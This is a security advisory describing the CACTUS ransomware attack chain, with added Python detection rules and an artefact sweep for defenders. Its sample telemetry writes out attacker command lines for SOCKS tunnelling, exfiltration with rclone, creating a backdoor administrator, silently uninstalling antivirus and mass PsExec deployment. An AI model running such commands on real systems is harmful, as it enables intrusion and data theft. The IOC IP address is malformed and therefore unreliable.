Ransomware
EXECUTIVE OVERVIEW
A new strain of ransomware targeting large commercial entities has been identified and dubbed CACTUS; it exploits documented vulnerabilities in VPN devices to gain initial access. According to researchers, CACTUS Ransomware has been active since at least March of this year.
WAY OF OPERATING
As observed in the research, CACTUS implements an overlapping set of tactics, techniques and procedures (TTPs) to compromise its victims. These include the use of tools such as Chisel, Rclone, TotalExec, scheduled tasks and custom scripts to disable security software and distribute the ransomware binary.
ACCESS
To gain initial access, CACTUS exploits known vulnerabilities in VPN devices. It then uses a file named ntuser[.]dat inside C:\ProgramData to pass an AES key that decrypts an RSA public key, which in turn decrypts the binary; the binary establishes a backdoor over SSH to the C&C server and keeps itself running through scheduled tasks.
Once inside the network, the threat actor performs an initial internal scan via SoftPerfect Network Scanner (netscan). PowerShell commands are executed to enumerate endpoints, view Windows 4624 security events to identify user accounts and ping remote endpoints. The output of these commands is saved to text files on the host machine. The output files are subsequently used for execution of the ransomware binary.
To maintain persistence within the environment, the threat actor sets up several remote access methods through legitimate tools such as Splashtop, AnyDesk and SuperOps RMM, along with Cobalt Strike and Chisel, a SOCKS5 proxy tool. Chisel tunnels traffic through firewalls to give the threat actor hidden communication with their C2, which can be used to retrieve additional scripts and tools onto the endpoint.
Once the threat actor has obtained the required level of access, they execute a batch script that uses msiexec to uninstall common antivirus software by its product GUID.
For lateral movement, the threat actor then attempts to dump users' web browser credentials and manually searches the disk for files containing passwords. They may also attempt to dump LSASS credentials for further privilege escalation. An additional batch script is then used to add privileged accounts to remote endpoints.
HOW ENCRYPTION IS EXECUTED
For ransomware execution, the threat actors use common exfiltration tools such as Rclone to automatically copy files to cloud storage, and then run a script ( f1[.]bat ), also observed in BLACKBASTA ransomware operations and known as TotalExec[.]ps1, that uses PsExec to automate deployment of the encryptor. The script first creates a new administrator user account, then registers a second script, f2[.]bat, for automatic machine-level execution before rebooting the device. f2[.]bat is a batch script that extracts the ransomware encryptor binary with 7zip, deletes the zip file and runs the binary with the flag set that allows it to execute. PsExec then runs it remotely on the list of devices in the ips[.]txt file created earlier.
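The chain described above, from the internal scan through PsExec deployment, leaves a trail in process-creation telemetry. The following Python is an added example written for this page, not code from the original advisory or from any vendor product: it runs a set of regex rules over constructed process-creation events (host names, account names, paths, the product GUID and the 203.0.113.10 address are all placeholders) and rolls hits up per host by stage, since one tool on its own is rarely conclusive while several stages on one host in a short window are. Credential dumping from browsers or LSASS is deliberately left out; it needs process-access telemetry (for example Sysmon Event ID 10) rather than process creation.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Process-creation record (Sysmon Event ID 1 / Security 4688 style), constructed for this example."""
    host: str
    user: str
    image: str
    cmdline: str


# One regex per CACTUS behaviour described in the advisory; each runs over "image cmdline".
# Rule names carry a stage prefix so hits can be rolled up per host.
RULES = [
    ("recon: SoftPerfect netscan",
     re.compile(r"\bnetscan(?:64)?\.exe\b", re.I)),
    ("recon: 4624 logon-event enumeration via PowerShell",
     re.compile(r"powershell.*(?:get-winevent|get-eventlog).*\b4624\b", re.I)),
    ("persistence: remote-access tool (Splashtop/AnyDesk/SuperOps)",
     re.compile(r"\b(?:anydesk|splashtop|superops)", re.I)),
    ("c2: chisel SOCKS proxy",
     re.compile(r"\bchisel(?:\.exe)?\b.*\b(?:client|server)\b", re.I)),
    ("defence evasion: msiexec silent uninstall by product GUID",
     re.compile(r"msiexec.*\s/x\s*\{[0-9a-f-]{36}\}.*\s/q", re.I)),
    ("privilege escalation: local account created or added to Administrators",
     re.compile(r"\bnet\s+(?:user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)", re.I)),
    ("exfiltration: rclone transfer to remote storage",
     re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b", re.I)),
    ("execution: TotalExec / f1.bat / f2.bat staging scripts",
     re.compile(r"\b(?:totalexec\.ps1|f1\.bat|f2\.bat)\b", re.I)),
    ("execution: archive unpacked with 7-Zip",
     re.compile(r"\b7za?(?:\.exe)?\s+[xe]\b", re.I)),
    ("lateral movement: PsExec driven by an ips.txt target list",
     re.compile(r"psexec.*ips\.txt", re.I)),
]


def detect(events):
    """Return (host, user, rule_name) for every rule each event trips."""
    hits = []
    for ev in events:
        haystack = f"{ev.image} {ev.cmdline}"
        for name, pattern in RULES:
            if pattern.search(haystack):
                hits.append((ev.host, ev.user, name))
    return hits


def kill_chain_coverage(events):
    """Map each host to the set of stages seen on it. Several stages on one host is the
    signal worth paging on; a lone netscan or AnyDesk hit is often an admin at work."""
    stages = {}
    for host, _user, name in detect(events):
        stages.setdefault(host, set()).add(name.split(":")[0])
    return stages


# Constructed sample telemetry (placeholder hosts, users, paths, GUID and address).
SAMPLE_EVENTS = [
    ProcEvent("ws01", "corp\\jdoe", "netscan.exe",
              r"netscan.exe /range:10.0.0.1-10.0.0.254 /auto:C:\Users\Public\hosts.txt"),
    ProcEvent("ws01", "corp\\jdoe", "powershell.exe",
              "powershell.exe -Command \"Get-WinEvent -LogName Security -FilterXPath "
              "'*[System[EventID=4624]]' | Out-File C:\\Users\\Public\\users.txt\""),
    ProcEvent("ws01", "corp\\jdoe", "AnyDesk.exe", r"C:\ProgramData\AnyDesk\AnyDesk.exe --install"),
    ProcEvent("ws01", "corp\\jdoe", "chisel.exe", "chisel.exe client 203.0.113.10:8080 R:socks"),
    ProcEvent("ws01", "corp\\jdoe", "msiexec.exe",
              "msiexec.exe /x {12345678-1234-1234-1234-123456789ABC} /qn"),
    ProcEvent("ws01", "corp\\jdoe", "cmd.exe",
              "cmd.exe /c net user backupsvc Passw0rd! /add && net localgroup administrators backupsvc /add"),
    ProcEvent("ws01", "corp\\jdoe", "rclone.exe", r"rclone.exe copy D:\Finance remote:exfil --transfers 8"),
    ProcEvent("ws01", "corp\\jdoe", "7z.exe", r"7z.exe x C:\ProgramData\enc.zip -oC:\ProgramData -y"),
    ProcEvent("ws01", "corp\\jdoe", "psexec.exe",
              r"psexec.exe @C:\ProgramData\ips.txt -d -s cmd /c C:\ProgramData\f2.bat"),
    # Benign noise that must not trip the rules above.
    ProcEvent("ws02", "corp\\svc_backup", "msiexec.exe", r"msiexec.exe /i C:\Temp\agent.msi /qn"),
    ProcEvent("ws02", "corp\\alice", "powershell.exe", "powershell.exe -Command Get-Process"),
]


if __name__ == "__main__":
    for host, user, rule in detect(SAMPLE_EVENTS):
        print(f"{host:6} {user:18} {rule}")
    for host, stages in kill_chain_coverage(SAMPLE_EVENTS).items():
        print(f"{host}: {len(stages)} stages -> {sorted(stages)}")
```

On the constructed sample the eight attacker events on ws01 trip ten rules across eight stages, while the two ws02 events trip none; in a real deployment the per-host roll-up would be bounded by a time window and the regexes replaced or supplemented by your EDR's own process lineage fields.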
RANSOM NOTE
Once the victim's files have been encrypted, the setup modes run, which allow the binary to copy itself to the path C:\ProgramData\{Victim_ID}[.]exe, for example C:\ProgramData\abc1-d2ef-gh3i4jkl[.]exe.
Next, the ransomware writes a hex-encoded configuration file, wrapped in junk data, to C:\ProgramData[.]dat. It contains the path to the original executable, the base64 string that was passed with the "-i" command-line argument, and any other command-line arguments. The hexadecimal string is further obfuscated by shifting its alignment so that each two-character byte representation is pushed into a single character, before the scheduled task is subsequently executed.
The decryption mode then runs using the AES algorithm, and the resulting plaintext is loaded into an RSA public key object.
Once encryption has run, the files are given the extension "cts\d", where the last character is a swappable digit. A ransom note called "cAcTuS[.]readme[.]txt" is then created with details on how the victim can negotiate via TOX chat.
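The on-disk artefacts just described (the victim-ID named copy in C:\ProgramData, an ntuser[.]dat outside any user profile, the "cts" plus digit extension and the ransom note) are what a responder sweeps for on hosts that cannot yet be imaged. The Python below is an added example for this page, not the advisory's or any vendor's code. It walks a directory tree, flags those artefacts, and also compares SHA-256 digests against the three hashes listed under the indicators at the end of this page. The victim-ID filename pattern (4-4-8 alphanumeric groups) is an assumption taken from the page's single example, and the sample tree it builds is constructed, with placeholder file contents.

```python
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass

# SHA-256 values listed under the indicators of compromise on this page.
CACTUS_SHA256 = {
    "5b70972c72bf8af098350f8a53ec830ddbd5c2c7809c71649c93f32a8a3f1371",
    "ebce70ec427279c0717b899bdba48ced38c4a70933035c6b936d89e00d1cfe16",
    "b9ef2e948a9b49a6930fc190b22cbdb3571579d37a4de56564e41a2ef736767b",
}

ENCRYPTED_EXT = re.compile(r"\.cts\d$", re.I)            # "cts" followed by one swappable digit
RANSOM_NOTE = re.compile(r"^cactus\.readme\.txt$", re.I)  # case-insensitive: cAcTuS.readme.txt
# Assumed shape of the {Victim_ID}.exe copy, derived from the page's example abc1-d2ef-gh3i4jkl.exe.
VICTIM_ID_EXE = re.compile(r"^[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{8}\.exe$", re.I)


@dataclass
class Finding:
    path: str
    reason: str


def sha256_of(path):
    """Streamed SHA-256 so large files do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root, ioc_hashes=CACTUS_SHA256):
    """Walk `root` (a drive or a mounted image) and return a Finding per artefact.
    Every file is hashed; on a real volume you would cap that by size or extension."""
    findings = []
    programdata = os.path.normcase(os.path.join(root, "ProgramData"))
    for dirpath, _dirs, files in os.walk(root):
        in_programdata = os.path.normcase(dirpath) == programdata
        for name in files:
            path = os.path.join(dirpath, name)
            if ENCRYPTED_EXT.search(name):
                findings.append(Finding(path, "encrypted-file extension .cts<digit>"))
            if RANSOM_NOTE.match(name):
                findings.append(Finding(path, "ransom note cAcTuS.readme.txt"))
            if in_programdata and VICTIM_ID_EXE.match(name):
                findings.append(Finding(path, "victim-ID named exe in ProgramData"))
            if in_programdata and name.lower() == "ntuser.dat":
                # A real ntuser.dat lives under C:\Users\<name>; one in ProgramData is the AES key carrier.
                findings.append(Finding(path, "ntuser.dat outside a user profile"))
            if sha256_of(path) in ioc_hashes:
                findings.append(Finding(path, "sha256 matches listed IOC"))
    return findings


def build_sample_tree():
    """Constructed host layout for demonstration; returns (root, {label: path})."""
    root = tempfile.mkdtemp(prefix="cactus_sweep_")
    layout = {
        "victim_exe": ("ProgramData", "abc1-d2ef-gh3i4jkl.exe"),
        "unknown_dat": ("ProgramData", "abc1-d2ef-gh3i4jkl.dat"),
        "ntuser": ("ProgramData", "ntuser.dat"),
        "encrypted": ("Users/alice/Documents", "q3-report.xlsx.cts1"),
        "note": ("Users/alice/Documents", "cAcTuS.readme.txt"),
        "benign": ("Users/alice/Documents", "notes.txt"),
        "real_ntuser": ("Users/alice", "ntuser.dat"),  # legitimate profile hive, must not be flagged
    }
    paths = {}
    for label, (sub, name) in layout.items():
        directory = os.path.join(root, *sub.split("/"))
        os.makedirs(directory, exist_ok=True)
        path = os.path.join(directory, name)
        with open(path, "wb") as f:
            f.write(f"constructed sample content for {label}\n".encode())
        paths[label] = path
    return root, paths


if __name__ == "__main__":
    root, _paths = build_sample_tree()
    for finding in sweep(root):
        print(f"{finding.reason:40} {os.path.relpath(finding.path, root)}")
```

Run against the constructed tree it reports four findings and leaves the legitimate ntuser.dat under Users\alice alone; the digest check only fires when an actual IOC hash is present, which is why the test seeds the set with the digest of a sample file rather than pretending a placeholder matches the listed hashes.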
MITIGATION
The following is recommended:
- Create a custom rule to block the IOCs on inbound perimeter profiles.
- Phishing campaigns are characterized by spelling mistakes or design errors. Check the content carefully, and be wary of emails with imperfections.
- Be wary of alarming emails. If a message tells you or encourages you to make hasty or time-sensitive decisions, it is probably phishing.
- Deploy anti-spam systems for e-mail, reducing the chance of infection through mass malspam campaigns.
- Protect the RDP protocol:
  - Disable RDP services if they are not necessary. Disabling unused and unnecessary services reduces your exposure to security vulnerabilities and is good security practice.
  - If they cannot be closed, limit the source addresses that can access the ports.
  - Protect access to RDP systems by locking the local system rather than the remote system. Even if the local system itself holds nothing of value, the RDP session is only as protected as access to the client system.
  - Disconnect RDP sessions instead of locking them; this invalidates the current session and prevents an automatic reconnection to the RDP session without credentials.
  - Block TCP port 3389 in both directions with a firewall, or make it reachable only through a private VPN.
  - Enable Network Level Authentication (NLA).
- Have periodic backup policies, with backups stored outside the organizational network.
- Scan all attachments before opening them with an antivirus that uses behavioral detection to combat ransomware.
- Maintain a sound backup strategy: backup systems that are isolated from the network, and the security policies to support them. This helps neutralize the attack, restore operations and avoid paying the ransom.
- Upgrade Windows computers to the latest versions.
- Never follow an instruction to disable security features, even if an e-mail or document requests it.
- Establish security policies on the system to prevent execution of files from directories commonly used by ransomware (AppData, Local AppData, etc.).
- Maintain access control lists on mapped network drives that restrict write privileges. This lets you gauge the impact of the file encryption, bearing in mind that the data hijacking will reach every network drive mapped on the victim computer.
- Follow international standards such as ISO 27001:2013, control A.7.2.2 "Awareness with education and training in information security", or NIST PR.AT-1: "All users are trained and informed", as a basis for user-level awareness campaigns on the correct use of technological tools, emphasizing how to proceed when receiving emails of unknown origin, so that users do not fall victim to malicious entities.
INDICATORS OF COMPROMISE
IP
- 123.142.213
HASH
- 5b70972c72bf8af098350f8a53ec830ddbd5c2c7809c71649c93f32a8a3f1371
- ebce70ec427279c0717b899bdba48ced38c4a70933035c6b936d89e00d1cfe16
- b9ef2e948a9b49a6930fc190b22cbdb3571579d37a4de56564e41a2ef736767b